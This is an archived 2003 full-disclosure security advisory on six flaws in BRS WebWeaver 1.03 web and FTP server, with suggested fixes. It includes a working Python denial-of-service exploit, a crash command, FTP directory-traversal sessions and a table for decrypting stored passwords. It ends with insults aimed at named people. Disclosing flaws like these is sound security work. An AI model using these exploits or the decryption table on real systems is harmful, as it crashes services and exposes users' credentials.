BRS WebWeaver: full disclosure

From: euronymous (just-a-userat_private)
Date: Mon Mar 31 2003 - 10:35:42 PST

  • Next message: subj: "TYPSoft FTP Server" 

    =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: full disclosure
product: BRS WebWeaver 1.03 
vendor: http://www.brswebweaver.com
risk: high
date: 31/03/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/019.en.txt
               http://f0kp.iplus.ru/bz/019.ru.txt 
contact email: euronymousat_private
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

Issues
------

1. Dos Device Path vulnerability in FTP Server
2. Long URL DoS in HTTP Server 
3. Weak Encryption Sheme
4. Remote System Information Gathering
5. Path Disclosure in FTP Server 
6. Directory Traversal in FTP Server


1. Dos Device Path vulnerability in FTP Server
----------------------------------------------

i have found, that FTP server doesnt checks path, typed by user. 
malicious local user can crash FTP (and HTTP also) server on 
non-patched Windows98 machine. 

just type this command in WebWeaver ftp session: 

cd /aux/aux/

After this server goes down..
Solutions: 
           1) Apply corresponding patch for your windows
           2) Wait for new version of WebWeaver
           3) Remove this crap at all ))


2. Long URL DoS in HTTP Server 
------------------------------

If any local/remote user pass to http server url, that contain 
2499361 charakters, then server was crashed in 2-5 minutes.  
It will eat all RAM and finally hang up whole system. Need to
reboot. Exploit as below:


}------- start of fWWhtdos.py ---------------{

#! /usr/bin/env python
###
# WebWeaver 1.03 Http Server DoS exploit 
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fWWhtdos.py target
# Ex.:   ./fWWhtdos.py 127.0.0.1
########

import sys, httplib

target = sys.argv[1]
spl = "f"*2499361
conn = httplib.HTTPConnection(target)
conn.request("GET", "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fWWhtdos.py ---------------{


following is appear in error.log of WebWeaver:


}-------------------------- start of error.log ------------------------{


31/Mar/2003:04:28:52    LOG_ALERT       ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52    LOG_ALERT       ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52    LOG_WARNING     Admin Thread NOT Stopped!  NOT ASSIGNED!

}--------------------------- end of error.log -------------------------{

Solutions: 

           1) Wait for new version of WebWeaver
           2) Remove this crap at all ))




3. Weak Encryption Sheme
------------------------

Webweaver `encrypt' ftp-users passwords and all password
hashes stored in \config\users.ini file under WebWeaver 
installation directory. Data is stored in following format:

user=hashed_passwd

Passwords arent case-sensivity for WebWeaver. Below you can 
see encryption table: 

g i k m o q s u w e       == encrypted
1 2 3 4 5 6 7 8 9 0       == plain


Ú Õ ð Ê Î Þ Ð þ Ç Å » ¿   == encrypted
q w e r t y u i o p [ ]   == plain


ú Ì î ó õ è ý ù ü { S     == encrypted
a s d f g h j k l ; '     == plain


Ý È ì Ó ê Â ñ ] a c       == encrypted
z x c v b n m , . /       == plain


Any local user can to get this file [users.ini] and 
`decrypt' user passwords.

Solutions: 

       1) Wait for WebWeaver vendor implement strong encryption 
          sheme like MD5 and BlowFish.
       2) Remove this crap at all )). 



4. Remote System Information Gathering
--------------------------------------

Any remote user can get many useful information about 
system, where BRS WebWeaver is installed. If within 
installation procedure test cgi scripts was installed
[in default], then it will enough to go to this url:

http://hostname/scripts/testcgi.exe


}--------------- start of testcgi.exe output ---------------{

CGI Test Program
Arguments To Testcgi

Argument 1 : 

Environment Variables

HTTP_CONNECTION      = keep-alive
HTTP_KEEP_ALIVE      = 300
HTTP_ACCEPT_CHARSET  = utf-8,*
HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
HTTP_ACCEPT          = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
HTTP_USER_AGENT      = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309
HTTP_HOST            = localhost
SERVER_PORT          = 80
URL                  = /scripts/testcgi.exe
LOCAL_ADDR           = 195.***.**.**
CONTENT_LENGTH       = 0
SERVER_SOFTWARE      = BRS WebWeaver/1.03
SERVER_PROTOCOL      = HTTP/1.0
SERVER_NAME          = ******30
REMOTE_HOST          = 127.0.0.1
REMOTE_ADDR          = 127.0.0.1
REQUEST_METHOD       = GET
DOCUMENT_ROOT        = c:\program files\webweaver
SCRIPT_NAME          = /scripts/testcgi.exe
GATEWAY_INTERFACE    = CGI/1.1
WINDIR               = C:\WINDOWS
CMDLINE              = WIN
COMSPEC              = C:\WINDOWS\COMMAND.COM
PATH                 = C:\WINDOWS;C:\WINDOWS\COMMAND
WINBOOTDIR           = C:\WINDOWS
PROMPT               = $p$g
TEMP                 = C:\WINDOWS\TEMP
TMP                  = C:\WINDOWS\TEMP

Miscellaneous Information

Working directory: C:/Program Files/WebWeaver/scripts/

Current date and time: 2003/03/31 5:07:32 

}--------------- end of testcgi.exe output ---------------{


Solution: Remove this script from /scripts/ directory.



5. Path Disclosure in FTP Server
--------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver 
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03
this flaw else doesnt was fixed. 

}-------------- sample session -----------{

220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir test
257 '/test': directory created.
ftp> mkdir test
550 'c:\ftp\test': can't create directory.
ftp> rmdir test
250 '/test': directory removed.
ftp> rmdir test
550 'c:\ftp\test': no such directory.
ftp>

}-------------- sample session -----------{

So, if user make attempt to create already existent
directory or remove unexistent directory, then 
Ftp server will output full system path.

Solutions: 
   	     1) Wait for new version of WebWeaver
             2) Remove this crap at all ))



6. Directory Traversal in FTP Server
------------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver 
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03
this flaw else doesnt was fixed. 

}-------------- sample session -----------{

220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../test
257 '/..\test': directory created.
ftp> rmdir ../test
250 '/..\test': directory removed.
ftp> mkdir ../windows/test
257 '/..\windows\test': directory created.
ftp> rmdir ../windows/test
250 '/..\windows\test': directory removed.
ftp>

}-------------- sample session -----------{

How you can see any user can exploit this traversal
bug for creating and removing directories outside
ftp_root. But user cannot use more useful commands 
like `ls', `dir'.

Solutions:
           1) Wait for new version of WebWeaver
           2) Remove this crap at all ))



shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, all russian 
security guyz!! to kate especially )) 
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb 
f*cking team
          

================
im not a lame,
not yet a hacker
================

    This archive was generated by hypermail 2b30 : Tue Apr 01 2003 - 20:28:58 PST